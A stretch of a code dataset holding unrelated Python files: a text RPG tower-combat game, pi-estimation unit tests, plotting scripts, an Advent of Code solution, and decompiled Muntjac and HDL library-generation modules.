good luck!\\n\")\n\tos.system('pause')\n\t\n\tPlayer.tower_level = 1\n\t\n\twhile 1:\n\t\t#Select an enemy based on tower level\n\t\tEnemy = enemy_selection(Player.tower_level) \n\n\n\t\t#Displays information about the character\n\t\t#display_stats(Player)\n\t\tclear_screen()\n\t\tprinto(\"---Tower Level: [\"+str(Player.tower_level)+\"]---\")\n\t\tcombat_stats(Enemy)\n\n\t\tcombat_stats(Player)\n\t\t\n\t\tos.system('pause')\n\t\t\n\t\t#perform combat\n\t\tattack_order(Player,Enemy)\n\t\t\n\t\t#After combat is over, End of combat actions take place\n\t\tcombat_end(Player,Enemy)\n\t\t\n\t\t#If Tower Level = 10 the player wins\n\t\tif Player.tower_level == 10:\n\t\t\tvictory_screen(Player)\n\t\t\t\n\t\t#increase tower level following each victory\n\t\tPlayer.tower_level += 1\n\treturn 0\n \n#Starting point for the game (Not implemented yet)\ndef story_mode(Player):\n\tprinto(\"Story Mode not implemented yet, goodbye\")\n\treturn 0\n\n#Enemy Selection for Tower Mode combat (Currently completely random no monster tiers)\ndef enemy_selection(Tower_Level):\n \n\t#Obtain a list of potential enemies\n\tif (Tower_Level < 5):\n\t\tenemy_stats = tier_one()\t\n\telif (Tower_Level < 10):\n\t\tenemy_stats = tier_two()\n\telse:\n\t\tenemy_stats = tier_three()\n\t#Code for randomly selecting an enemy based on time seed\n\tenemy_count = len(enemy_stats)\n \n\t#Select a random enemy based on how many are available\n\trandom_value = randint(0,enemy_count-1)\n\t\n\treturn enemy_stats[random_value]\n\n#Tier 1 Biome: Forest\ndef tier_one():\n\tenemy_count = 5\n\trows, cols = (enemy_count, 11)\n\tenemy_list = [[0]*cols]*rows \n\t\n\t\t#\t\t\tName,\t\t\t \tRole,\t\t Base-HP,\tMax-HP,\tWeapon,\t\t Weapon-L, Weapon-H, \tWeapon Crit% Strength Dexterity Constitution\tLevel\n\tenemy_list[0] = [\"Deer\",\t\t\t\"Beast\", \t\t3,\t\t 3,\t\"Hoof\",\t\t\t2,\t\t 3,\t\t20,\t\t\t \t4,\t \t4,\t\t\t6,\t\t\t\t1]\n\tenemy_list[1] = [\"Eagle\",\t\t \t\"Beast\",\t \t3,\t\t 3,\t\"Talon\",\t\t2,\t\t 3,\t\t20,\t\t\t \t6,\t\t6,\t\t\t3,\t\t\t\t1]\n\tenemy_list[2] = [\"Red Wolf\",\t\t\"Beast\", \t\t3,\t\t 3,\t\"Fangs\",\t\t2,\t\t 3,\t\t20,\t\t\t \t5,\t \t5,\t\t\t5,\t\t\t\t1]\n\tenemy_list[3] = [\"Boar\", \t\t\t\"Beast\",\t \t3,\t\t 3,\t\"Tusks\",\t\t2,\t\t 3,\t\t20,\t\t\t \t4,\t \t5,\t\t\t7,\t\t\t\t1]\n\tenemy_list[4] = [\"Rabbit\",\t\t\t\"Beast\",\t\t3,\t\t 3,\t\"Teeth\",\t\t2,\t\t 3,\t\t20,\t\t\t \t5,\t \t7,\t\t\t3,\t\t\t\t1]\n\tenemy_stats = [0]*rows \n\t#apply stats for all enemies created dynamically\n\tfor i in range(enemy_count):\n\t\tenemy_stats[i] = set_enemy(enemy_list[i])\n\treturn enemy_stats\n\ndef tier_two():\n\tenemy_count = 5\n\trows, cols = (enemy_count, 11)\n\tenemy_list = [[0]*cols]*rows \n\t\n\t\t#\t\t\tName,\t\t\t \tRole,\t\t \tBase-HP,\tMax-HP,\t \tWeapon,\t\t Weapon-L, Weapon-H, Weapon Crit% Strength Dexterity Constitution Level\n\tenemy_list[0] = [\"Gate Guard\",\t\t\"Human\",\t\t5,\t\t \t5,\t\t \t\"Rusty Sword\",\t3,\t\t 5,\t\t20,\t\t\t \t8,\t \t5,\t\t \t7,\t\t2]\n\tenemy_list[1] = [\"Archer\",\t\t \t\"Human\",\t \t5,\t\t \t5,\t\t \t\"Longbow\", \t\t3,\t\t 5,\t\t20,\t\t\t \t4,\t \t12,\t\t \t4,\t\t2]\n\tenemy_list[2] = [\"Pikeman\",\t\t\t\"Human\", \t\t5,\t\t \t5,\t\t \t\"Pike\",\t\t \t3,\t\t 5,\t\t20,\t\t\t \t5,\t \t5,\t\t \t5,\t\t2]\n\tenemy_list[3] = [\"Templar\", \t\t\"Human\",\t \t5,\t\t \t5,\t\t \t\"Mace\",\t\t\t3,\t\t 5,\t\t20,\t\t\t \t6,\t \t6,\t\t\t8,\t\t2]\n\tenemy_list[4] = [\"King's Guard\",\t\"Human\",\t\t5,\t\t \t5,\t\t \t\"Claymore\",\t\t3,\t\t 5,\t\t20,\t\t\t \t10,\t \t5,\t\t 
\t5,\t\t2]\n\tenemy_stats = [0]*rows \n\t#apply stats for all enemies created dynamically\n\tfor i in range(enemy_count):\n\t\tenemy_stats[i] = set_enemy(enemy_list[i])\n\treturn enemy_stats\n\ndef tier_three():\n\tenemy_count = 1\n\trows, cols = (enemy_count, 11)\n\tenemy_list = [[0]*cols]*rows \n\t\n\t\t#\t\t\tName,\t\t\t \t\t\tRole,\t\t \tBase-HP,\tMax-HP,\t \tWeapon,\t\t Weapon-L, Weapon-H,\t Weapon Crit% Strength Dexterity Constitution Level\n\tenemy_list[0] = [\"The Black Knight\",\t\t\"Demon\",\t\t10,\t\t \t10,\t\t \t\"Halburk\",\t\t3,\t\t 6,\t\t\t 20,\t\t\t 10,\t 10,\t\t \t10,\t\t\t3]\n\n\tenemy_stats = [0]*rows \n\t#apply stats for all enemies created dynamically\n\tfor i in range(enemy_count):\n\t\tenemy_stats[i] = set_enemy(enemy_list[i])\n\treturn enemy_stats\n\n#Sets the enemies Stats based on the tier\ndef set_enemy(data):\n\tclass Character:\n\t\t#Character Name\n\t\tname = data[0]\n\t\t#Character role\n\t\trole = data[1]\n\t\t#Current/Max\n\t\tbase_health = [data[2],data[3]]\n\t\t#Weapon Name\n\t\tweapon = data[4]\n\t\t#Damage has a low and high end\n\t\tweaponD = [data[5],data[6]]\n\t\t#Weapon Critical Strike Chance\n\t\tweaponC = data[7]\n\t\t\n\t\t#Strength of character --> Damage Bonus\n\t\tstrength = data[8]\n\t\tstrength_bonus = int(strength-5)\n\t\t\n\t\t#Dexterity of character --> Critical Strike Bonus\n\t\tdexterity = data[9]\n\t\tdexterity_bonus = int(dexterity-5)*10\n \n\t\t#Constitution of Character --> Increased Health\n\t\tconstitution = data[10]\n\t\tconstitution_bonus = int(constitution-5)\n\t\tlevel = data[11]\n\t\t\n\t\t#Enemies are not the player\n\t\tis_player = False\n\t\t\n\t\t#Enemies have no innate protection\n\t\tprotection = 0\n\t\t#Apply Attributes bonuses to damage, health, and critical strike chance\n\t\tdamage = [weaponD[0]+strength_bonus,weaponD[1]+strength_bonus]\n\t\t#Prevents damage from being lower than 0\n\t\tif weaponD[0] < 0:\n\t\t\tweaponD[0] = 0\n\t\t\n\t\thealth = [base_health[0]+constitution_bonus,base_health[1]+constitution_bonus]\n\t\tcritical = weaponC + dexterity_bonus\n\t\t#Prevent critical strike chance from being lower than 0%\n\t\tif (critical < 0):\n\t\t\tcritical = 0\n\t#Assign a player object to the class, and return\n\tPlayer = Character() \n\treturn Player\n\n#Displays basic infomration about a character (Used in Tower mode for enemies)\ndef combat_stats(character):\n\tprinto (\"\\n[\"+character.name+\"] [\"+str(character.role)+\"] Level: [\"+str(character.level)+\"]\")\n\tprinto(\"Health: [\"+str(character.health[0]) +\"/\"+str(character.health[1])+\"]\")\n\tprinto(\"Weapon: [\"+str(character.weapon)+\"] [\"+str(character.weaponD[0])+\"-\"+str(character.weaponD[1])+\"] Bonus: [\"+str(character.strength_bonus)+\"]\")\n\treturn 0\n\n#Based on first strike, loops each player back and \n#forth until someone is dead\ndef attack_order(Player,Enemy):\n\n\t#When result is 0, the enemy has been defeated\n\tend_of_combat = False\n\twhile end_of_combat == False:\n\t\n\t\t#If the player has first strike, they attack first\n\t\tif Player.first_strike:\n\t\t\t# (attacker,defender)\t\t\t\n\t\t\tend_of_combat = attack(Player,Enemy)\n\t\t\tend_of_combat = attack(Enemy,Player)\n\t\t\t \n\t\t\t#Else, enemy attacks first\n\t\telse:\n\t\t\tend_of_combat = attack(Enemy,Player)\n\t\t\tend_of_combat = attack(Player,Enemy)\n\t\n\treturn 0\n\n#Defines actions that take place after combat finishes\ndef combat_end(Player,Enemy):\n\tclear_screen()\n\tprinto(\"---Combat is Over---\")\n\tprinto(Enemy.name+\" has been 
defeated!\")\n\texperience(Player, Enemy)\n\t\n\t#If applicable, restore health to player\n\trestoration(Player)\n\tos.system(\"pause\")\n\tdisplay_stats(Player)\n\tos.system(\"pause\")\n\t\n\treturn 0\n\t\n#Heal character after combat if they have restoration\ndef restoration(Player):\n\tif Player.restoration > 0:\n\t\tPlayer.health[0] = Player.health [0] + Player.restoration\n\t\tif Player.health[0] > Player.health[1]:\n\t\t\tPlayer.health[0] = Player.health[1]\n\t\tprinto(\"\\n\"+str(Player.name)+\"'s natural healing takes effect\")\n\t\tprinto(str(Player.name)+\" has restored: [\"+str(Player.restoration)+\"] Health.\")\n\t\tprinto(str(Player.name)+\": [\"+str(Player.health[0])+\"/\"+str(Player.health[1])+\"] Health\")\n\treturn Player\n\n#Player chooses their action during combat\ndef combat_selection(Attacker,Defender):\n\twhile 1:\n\t\ttry:\n\t\t\tprinto(\"[1] - Attack with [\"+str(Attacker.weapon)+\"] (\"+str(Attacker.damage[0])+\"-\"+str(Attacker.damage[1])+\")\")\n\t\t\tprinto(\"[2] - Wait\")\n\t\t\tselection = int(printi(\"Choose:\"))\n\t\t\tif selection == 1:\n\t\t\t\treturn 1\n\t\t\tif selection == 2:\n\t\t\t\treturn 2\n\t\t\tprinto(\"Invalid Input!\")\n\t\texcept ValueError as e:\n\t\t\tprinto(\"Invalid Input!\\n\")\n\t\t\tcontinue\n\t\n\treturn 0\n \n#If the player has 0 health, the game is over\ndef game_over_check(Attacker,Defender):\n\tif (Defender.health[0] <= 0 and Defender.is_player == True):\n\t\tclear_screen()\n\t\tprinto(\"You have died.\")\n\t\tprinto(\"Your adventure ends here...\")\n\t\tos.system(\"pause\")\n\t\tdisplay_stats(Defender)\n\t\tsys.exit()\n\t\t\n\tif (Attacker.health[0] <= 0 and Attacker.is_player == True):\n\t\tclear_screen()\n\t\tprinto(\"You have died.\")\n\t\tprinto(\"Your adventure ends here...\")\n\t\tdisplay_stats(Attacker)\n\t\tsys.exit()\n\treturn 0\n \n#Calculates damaged based on attacker stats\ndef attack(Attacker,Defender):\n\t\n\t#Attacker cannot respond if they are dead\n\tif Attacker.health[0] <= 0:\n\t\treturn\n\t\n\t#Header for Attacking function\n\tprinto(\"\\n\")\n\tprinto(\"---\"+Attacker.name+\"'s Turn---\")\n\t\n\t#Player selects their attack type\n\tif Attacker.is_player == True:\n\t\tselection = combat_selection(Attacker,Defender)\n\t\n\t#Enemy Selection is chosen randomly\n\telse:\n\t\tselection = 1\t\n\t\n\t#Basic Attack Calculation\n\tif selection == 1:\n\t\t#Calculate damage based on random range between low and high end \n\t\tend_of_combat = basic_attack(Attacker,Defender)\n\t\treturn end_of_combat\n\t\n\telif selection == 2:\n\t\tprinto(\"You choose to skip your turn\")\n\t\treturn False\n\n\t#should not reach this line\n\treturn False\n\n#Display's the damage from combat to the screen\ndef damage_display(Attacker,Defender,damage):\n\tprinto(str(Attacker.name)+\" hits \"+str(Defender.name)+\" for: [\"+str(damage)+\"] Damage with: [\"+str(Attacker.weapon)+\"]\")\n\tprinto(str(Defender.name)+\" now has: [\"+str(Defender.health[0])+\"] / [\"+str(Defender.health[1])+\"]\")\n\tos.system(\"pause\")\n\treturn 0\n\n#Apply damage to the defending player's health\ndef damage_apply(Attacker,Defender, damage):\n\tDefender.health[0] = Defender.health[0] - damage\n\t#return 0 if Defender has died\n\tif Defender.health[0] <= 0:\n\t\treturn True\n\treturn False\n\ndef level_up(Player):\n\tprinto(\"---LEVEL UP!---\")\n\tPlayer.level += 1\n\treturn 0\n\n#Gain experience after combat based on enemy defeated\ndef experience(Player, Enemy):\n\tPlayer.experience += Enemy.level\n\tprinto(\"Experience gain: 
+[\"+str(Enemy.level)+\"]\")\n\tprinto(\"Experience: [\"+str(Player.experience)+\"/\"+str(Player.experience_to_level[Player.level])+\"]\")\n\tif (Player.experience >= Player.experience_to_level[Player.level]):\n\t\tPlayer.experience = Player.experience - Player.experience_to_level[Player.level]\n\t\tlevel_up(Player)\n\n\treturn 0\n\n#Applies protection to combat \ndef protection(Attacker, Defender, damage):\n\tif Defender.protection > 0:\n\t\t#Reduce Damage based on protection\n\t\tdamage = damage - Defender.protection\n\t\tif damage < 0:\n\t\t\tdamage = 0\n\treturn damage\n\n#Calculates if a critical hit occurs\ndef critical_hit(Attacker, Defender, damage):\n\tcritical = randint (1,100)\n\tif critical > 100 - Attacker.critical:\n\t\tprinto(\"Critical hit!\")\n\t\treturn damage * 2\n\treturn damage\n\n#Performs a basic weapon attack based on damage range\ndef basic_attack(Attacker, Defender):\n\t\n\t#Base Damage based on damage range\n\tdamage = randint(Attacker.damage[0],Attacker.damage[1])\n\n\t#Apply Attacker Critical Strike\n\tdamage = critical_hit(Attacker, Defender, damage)\n\t\n\t#Apply Defender protection\n\tdamage = protection(Attacker, Defender,damage)\n\t\n\t#Removes health from Defender based on attack damage\n\t#If combat is over it will return True\n\tend_of_combat = damage_apply(Attacker, Defender, damage)\n\t\n\t#Display's damage output to the screen\n\tdamage_display(Attacker, Defender, damage)\n\t\n\tgame_over_check(Attacker,Defender)\n\treturn end_of_combat\n\n#If the player has defeated all levels of the tower\ndef victory_screen(Player):\n\tclear_screen()\n\tprinto(\"You've ascended to the top of the tower.\")\n\tprinto(\"Victory is yours!\")\n\tdisplay_stats (Player)\n\tsys.exit()\n\treturn 0\n \n#Main is the hub that calls other functions to start the game \ndef main(): \n\n\t#Clear the screen before the game starts\n\tclear_screen()\n\t\n\t#Display intro screen\n\tintro()\n\t\n\t#Select a nam\n\tname = character_name()\n\t\n\t#pick a class\n\tPlayer = class_selection(name)\n\n\t#The Class Player now contains all info about the player.\n\t\n\t#Select a gameplay mode\n\tmode = gameplay_selection()\n\t\n\tif mode == 1:\n\t\ttower_mode(Player)\n\tif mode == 2:\n\t\tstory_mode(Player)\t\t \t\n\treturn 0\n\t\n#Call main to begin the game (Set random seed for randomness!)\nseed(time.time())\nmain( )","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":19010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"173908990","text":"import math\nimport unittest\nimport random as rd\n\nclass TestWallis(unittest.TestCase):\n def test_low_iters(self):\n for i in range(0, 5):\n pi = wallis(i)\n self.assertTrue(abs(pi - math.pi) > 0.15, msg=f\"Estimate with just {i} iterations is {pi} which is too accurate.\\n\")\n \n def test_high_iters(self):\n for i in range(500, 600):\n pi = wallis(i)\n self.assertTrue(abs(pi - math.pi) < 0.01, msg=f\"Estimate with even {i} iterations is {pi} which is not accurate enough.\\n\")\n\n\nclass TestMC(unittest.TestCase):\n def test_randomness(self):\n pi0 = monte_carlo(15000)\n pi1 = monte_carlo(15000)\n \n self.assertNotEqual(pi0, pi1, \"Two different estimates for PI are exactly the same. This is almost impossible.\")\n\n self.assertFalse(abs(pi0 - pi1) > 0.05, \"Two different estimates of PI are too different. 
This should not happen\")\n\n def test_accuracy(self):\n for i in range(500, 600):\n pi = monte_carlo(i)\n self.assertTrue(abs(pi - math.pi) < 0.4, msg=f\"Estimate with even {i} iterations is {pi} which is not accurate enough.\\n\")\n\ndef wallis(n):\n\ts=1\n\tfor i in range(1,n+1):\n\t\td=4*i*i\n\t\tm=(d)/(d-1)\n\t\ts=s*m\n\treturn 2*s\ndef monte_carlo(n):\n\tsu=0\n\tfor i in range(n):\n\t\t(x,y)=(rd.random(),rd.random())\n\t\tk=x*x+y*y\n\t\tif(k<=1):\n\t\t\tsu=su+1\n\tv=4*(su/n)\n\treturn v \n \nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"estimate.py","file_name":"estimate.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"609460980","text":"import matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport numpy as np\nimport struct as struct\nfrom array import array\n\ndata_type = np.dtype('u1')\nbindata = np.fromfile(\"rgbdata.dat\", data_type)\nR = np.zeros((1080, 1920), dtype=data_type)\nG = np.zeros((1080, 1920), dtype=data_type)\nB = np.zeros((1080, 1920), dtype=data_type)\nfor j in range(0, 1920):\n for i in range(0, 1080):\n R[i][j] = bindata[0*1920*1080 + i*1920+j]\n G[i][j] = bindata[1*1920*1080 + i*1920+j]\n B[i][j] = bindata[2*1920*1080 + i*1920+j]\n\nplt.subplot(131)\nplt.imshow(R, cmap='gray', interpolation='nearest')\nplt.title(\"Red\")\nplt.subplot(132)\nplt.imshow(G, cmap='gray', interpolation='nearest')\nplt.title(\"Green\")\nplt.subplot(133)\nplt.imshow(B, cmap='gray', interpolation='nearest')\nplt.title(\"Blue\")\n\nplt.show()\n","sub_path":"plot_rgb.py","file_name":"plot_rgb.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"456586428","text":"from __future__ import unicode_literals\nfrom uncertainties import *\nfrom converterNew import *\nfrom uncertainties import unumpy\nfrom uncertainties import *\nfrom uncertainties.umath import *\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport matplotlib\n\n##matplotlib.rcParams['text.usetex'] = True\n##matplotlib.rcParams['text.latex.unicode'] = True\nfrom matplotlib import rc\n#rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\n## for Palatino and other serif fonts use:\n#rc('font',**{'family':'serif','serif':['Palatino']})\nrc('text', usetex=True)\n\n#all plots are saved in the Graphen folder\nif not os.path.exists(\"Graphen\"):\n os.mkdir(\"Graphen\")\n\n#data contains all of the information\n#data = np.array(convert(\"messwerteText\"))\n\n#data = convert(\"test\")\ndata = convert(\"Temperatur_back_front\")\n#print(data[0])\n\nfast=4\nslow=7\nslice=300\n\ntime1 = np.array(data[0],dtype=float)\ntime1 = np.concatenate((time1[0:slice:fast],time1[slice:1971:slow]))\n#time1=time1[0::2]\ntime2 = np.array(data[3],dtype=float)\ntime2 = np.concatenate((time2[0:slice:fast],time2[slice::slow]))\n#time2=time2[0::2]\nT1a = np.array(data[2], dtype=float)\nT1a = np.concatenate((T1a[0:slice:fast],T1a[slice:1971:slow]))\n#T1a=T1a[0::2]\nT1p = np.array(data[1], dtype=float)\nT1p = np.concatenate((T1p[0:slice:fast],T1p[slice:1971:slow]))\n#T1p=T1p[0::2]\nT2a = np.array(data[5], dtype=float)\nT2a = np.concatenate((T2a[0:slice:fast],T2a[slice::slow]))\n#T2a=T2a[0::2]\nT2p = np.array(data[4], dtype=float)\nT2p = np.concatenate((T2p[0:slice:fast],T2p[slice::slow]))\n#T2p=T2p[0::2]\n#x = x[0::100]\n\n#y = y[0::100]\n\n\n# Figures\nfig, ax = plt.subplots()\nax.plot(time1,T1p, color = 
'blue', marker='o', linestyle='', markersize = 1)\nax.plot(time1,T1a,'b--',linewidth = 0.6)\nax.plot(time2,T2p,'ro',markersize = 1)\nax.plot(time2,T2a,'r--',linewidth = 0.6)\nax.set(xlabel='Time (s)',ylabel='Temperature (K)')\nax.grid(True,linestyle='--',linewidth = 0.3)\n#ax.legend(loc='upper left',frameon=True)\n\nplt.xlim(-70,2600)\nplt.ylim(-1,15.9)\nplt.annotate('a', xy=(400,14), fontsize=14)\nplt.annotate('b', xy=(400,10.5), fontsize=14)\nplt.annotate('c', xy=(400,8.3), fontsize=14)\nplt.annotate('d', xy=(400,6.3), fontsize=14)\n\n#plt.annotate('a', xy=(2100,14), fontsize=14)\n#plt.annotate('b', xy=(2100,11), fontsize=14)\n#plt.annotate('c', xy=(2125,9), fontsize=14)\n#plt.annotate('d', xy=(2150,6.5), fontsize=14)\n\n#plt.xscale('log')\n#plt.title('test')\n\n#plt.plot(pointX, pointY, 'go', markersize=5)\n#plt.plot(lineX, lineY, 'r--', linewidth=0.8)\n#plt.errorbar(X, Y, yerr=0.1, fmt='ko', linewidth=0.8, capsize=3, capthick=0.8, markersize=5)\n#plt.xlabel(r'$\\textbf{Time } (ms)$')\n#plt.ylabel(r'$\\textbf{Temperature } (K)$')\ni='back_front'\nplt.savefig(\"Graphen/Temperature_\" + str(i) + \".png\")\n\nplt.show()","sub_path":"PlottingGp-master/Temperatur_back_front.py","file_name":"Temperatur_back_front.py","file_ext":"py","file_size_in_byte":2768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"333825302","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/muntjac/demo/sampler/features/embedded/WebEmbedExample.py\n# Compiled at: 2013-04-04 15:36:38\nfrom muntjac.api import VerticalLayout, Embedded\nfrom muntjac.terminal.external_resource import ExternalResource\n\nclass WebEmbedExample(VerticalLayout):\n\n def __init__(self):\n super(WebEmbedExample, self).__init__()\n e = Embedded('Google Search', ExternalResource('http://www.google.com'))\n e.setType(Embedded.TYPE_BROWSER)\n e.setWidth('100%')\n e.setHeight('400px')\n self.addComponent(e)","sub_path":"pycfiles/Muntjac-1.1.2-py2.7/WebEmbedExample.py","file_name":"WebEmbedExample.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"81643928","text":"lines = [n.strip() for n in open('d6in.txt').read().splitlines()]\n\ngroups = []\nnew_group = True\n\nfor line in lines:\n if new_group:\n groups.append(set([c for c in line]))\n new_group = False\n elif line == '':\n new_group = True\n else:\n groups[-1] &= set([c for c in line])\n\ncounts = [len(group) for group in groups]\n\nprint(sum(counts))\n","sub_path":"day06/d6b.py","file_name":"d6b.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"84802184","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.5 (3350)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /usr/local/lib/python3.5/dist-packages/HdlLib/SysGen/LibEditor.py\n# Compiled at: 2017-07-08 08:29:58\n# Size of source mod 2**32: 15472 bytes\n\"\"\"\nOpen a Gtk window enabling to browse the service library.\nIcons for library an service must be set when called from another location.\n\"\"\"\nimport logging, os, sys\nfrom lxml import etree\nfrom HdlLib.SysGen import Condition\nfrom HdlLib.SysGen import HDLEditor as HDL\nfrom HdlLib.SysGen import Module\n\ndef HDLModule(OutputPath, 
Mod, Packages, Libraries, Declarations, Content):\n \"\"\"\n Create a VHDL file with specified code content.\n \"\"\"\n OutputFilePath = os.path.join(OutputPath, Mod.Name + HDL.ExtensionDict['VHDL'])\n with open(OutputFilePath, 'w+') as (HDLFile):\n HDLFile.write(HDL.Header(Mod.Name, Mod.Title, Mod.Purpose, Mod.Desc, Mod.Issues, Mod.Speed, Mod.Area, Mod.Tool, Mod.Version))\n HDLFile.write(HDL.Libraries(Libraries))\n HDLFile.write(HDL.Packages(Packages))\n UsedParams = set(Mod.GetUsedParam())\n Generics = [x.HDLFormat(Mod.Vars.copy()) for x in [x for x in list(Mod.Params.values()) if x.Name in UsedParams]]\n for G in Generics:\n Mod.Vars.update({G.Name: G.InitVal})\n\n if Mod.NoOrthoPorts is True:\n Ports = [x.HDLFormat(Mod.Vars.copy()) for x in list(Mod.Ports.values())]\n else:\n Ports = [x.HDLFormat(Mod.Vars.copy()) for x in list(Mod.Ports.values()) + list(Mod.OrthoPorts.values())]\n Ports = RemoveDuplicated(Ports)\n HDLFile.write(HDL.Entity(Mod.Name, Generics, Ports, Comments=Mod.Purpose))\n HDLFile.write(HDL.Architecture('RTL', Mod.Name, Declarations, Content, Mod.Desc))\n return OutputFilePath\n\n\ndef NewModule(Infos={}, Params=[], Ports=[], Clocks=[], Resets=[], Sources=[]):\n \"\"\"\n Create a module to add to library (and its associated XML).\n return Module object created.\n \"\"\"\n M = etree.Element('module', name=Infos['Name'], version=Infos['Version'], title=Infos['Title'], purpose=Infos['Purpose'], description=Infos['Desc'], tool=Infos['Tool'], area=Infos['Area'], speed=Infos['Speed'], issues=Infos['Issues'])\n for Param in Params:\n etree.SubElement(M, 'parameter', name=Param.Name, size=str(Param.GetSize()), type=Param.Type, default=str(Param.GetValue()))\n\n for Port in Ports:\n if Port.Direction == 'IN':\n etree.SubElement(M, 'input', name=Port.Name, size=str(Port.Size), type=Port.Type, default=str(Port.GetValue()))\n else:\n etree.SubElement(M, 'output', name=Port.Name, size=str(Port.Size), type=Port.Type, default=str(Port.GetValue()))\n\n Services = etree.SubElement(M, 'services')\n for C in Clocks:\n Required = etree.SubElement(Services, 'required', name='clock', type='orthogonal', version='1.0', alias='Clk')\n MAP = etree.SubElement(Required, 'map', formal='clock', actual=C)\n MAP = etree.SubElement(Required, 'map', formal='freq', actual='50')\n\n for R in Resets:\n Required = etree.SubElement(Services, 'required', name='reset', type='orthogonal', version='1.0', alias='Rst')\n MAP = etree.SubElement(Required, 'map', formal='reset', actual=R)\n MAP = etree.SubElement(Required, 'map', formal='delay', actual='0')\n\n if len(Sources) > 0:\n etree.SubElement(M, 'resources')\n for Src in Sources:\n Core = etree.SubElement(M, 'core')\n etree.SubElement(Core, 'rtl', path=Src)\n\n return Module.Module(M)\n\n\ndef ModuleXml(Mod):\n \"\"\"\n Generate XML for module provided as Mod.\n \"\"\"\n XmlMod = etree.Element('module', name=Mod.Name, version=Mod.Version, title=Mod.Title, purpose=Mod.Purpose, description=Mod.Desc, tool=Mod.Tool, area=Mod.Area, speed=Mod.Speed, issues=Mod.Issues)\n for ParamName, Param in Mod.Params.items():\n RefAttr = {'name': Param.Name, 'size': str(Param.GetSize()), 'type': Param.Type, 'default': str(Param.GetValue())}\n AttrDict = collections.OrderedDict()\n for Name, Value in RefAttr.items():\n if Value is None:\n continue\n else:\n AttrDict[Name] = str(Value)\n\n XMLElmt = etree.SubElement(XmlMod, 'parameter', **AttrDict)\n\n for PortName, Port in Mod.Ports.items():\n RefAttr = {'name': Port.Name, 'size': str(Port.Size), 'type': Port.Type, 'default': 
str(Port.GetValue())}\n if Port.Func is not None:\n RefAttr['func'] = Port.Func\n AttrDict = collections.OrderedDict()\n for Name, Value in RefAttr.items():\n if Value is None:\n continue\n else:\n AttrDict[Name] = str(Value)\n\n AttrDict.update(Port.SpecialParameters)\n XMLElmt = etree.SubElement(XmlMod, 'output' if Port.Direction == 'OUT' else 'input', **AttrDict)\n\n ProvServices = etree.SubElement(XmlMod, 'services')\n for SAlias, SName in Mod.ServAlias.items():\n Mapping = Mod.ProvidedServMap[SName]\n Offered = etree.SubElement(ProvServices, 'offered', alias=SName.split('.')[(-1)], name=SName)\n for Formal, Actual in Mapping.items():\n if isinstance(Actual, list):\n FormatedList = [':'.join([x[0], x[1].GetName()]) for x in Actual]\n XMLElmt = etree.SubElement(Offered, 'map', formal=Formal, actual='{' + ','.join(FormatedList) + '}')\n else:\n XMLElmt = etree.SubElement(Offered, 'map', formal=Formal, actual=Actual)\n\n return XmlMod\n\n def ActualXMLRepr(InstName, SigName, Index):\n \"\"\"Return XML representation of an actual signal\"\"\"\n Actual = SigName\n if not (InstName is None or InstName == ''):\n Actual = InstName + '.' + Actual\n if not (Index is None or Index == ''):\n Actual = Actual + ':' + str(Index)\n return Actual\n\n def AddXMLMapping(PName, Mapping, RequiredXmlElmt):\n \"\"\"Add XML mapping corresponding to dictionary mapping to an XML element\"\"\"\n if PName in Mapping:\n ActualList, ACond, IdxDict = Mapping[PName]\n if len(ActualList) > 1:\n ActualNames = []\n for InstName, SigName, Index in ActualList:\n ActualNames.append(ActualXMLRepr(InstName, SigName, Index))\n\n Actual = '{' + ','.join(ActualNames) + '}'\n else:\n InstName, SigName, Index = ActualList[0]\n Actual = ActualXMLRepr(InstName, SigName, Index)\n if isinstance(ACond, Condition.Condition):\n ExtraArg = {'when': str(ACond)}\n else:\n ExtraArg = {}\n else:\n Actual = PName\n ExtraArg = {}\n return etree.SubElement(RequiredXmlElmt, 'map', formal=PName, actual=Actual, **ExtraArg)\n\n for ID, (Serv, Mapping, IsOrtho, Constraints) in Mod.ReqServ.items():\n if Serv is None:\n continue\n logging.error('Service not referenced library {0}.'.format(ID))\n Alias = ID.split('#')[(-1)]\n XmlRequired = etree.SubElement(Services, 'required', name=Serv.Name, type=str(Serv.Type), version=str(Serv.Version), alias=Alias)\n for PName in sorted(Serv.Params.keys()):\n XMLElmt = AddXMLMapping(PName, Mapping=Mapping, RequiredXmlElmt=XmlRequired)\n\n for PName in sorted(Serv.Ports.keys()):\n XMLElmt = AddXMLMapping(PName, Mapping=Mapping, RequiredXmlElmt=XmlRequired)\n\n for SrcType in Mod.Sources:\n if len(Mod.Sources[SrcType]) > 0:\n etree.SubElement(XmlMod, 'resources')\n for Src in Mod.Sources[SrcType]:\n Core = etree.SubElement(XmlMod, 'core')\n XMLElmt = etree.SubElement(Core, SrcType, path=Src)\n\n return XmlMod\n\n\ndef ProvidedServiceXml(Mod, Interfaces, Infos, OutputPath=None):\n \"\"\"\n Generate XML for service provided by module Mod.\n Dump into OutputPath file if specified.\n \"\"\"\n S = etree.Element('service', name=Infos['Name'], type=Infos['Type'], version=Infos['Version'], category=Infos['Category'])\n Mapping = {}\n for ParamName, Param in Mod.Params.items():\n RefAttr = {'default': str(Param.GetValue()), 